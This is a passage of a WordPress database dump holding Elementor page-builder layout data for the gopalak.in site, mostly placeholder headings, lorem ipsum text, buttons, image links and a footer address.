"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9021,1547,'_elementor_page_assets','a:0:{}'),(9024,1548,'_elementor_edit_mode','builder'),(9025,1548,'_elementor_template_type','wp-page'),(9026,1548,'_elementor_version','3.7.8'),(9027,1548,'_wp_page_template','elementor_canvas'),(9028,1548,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\",\"id\":1544,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 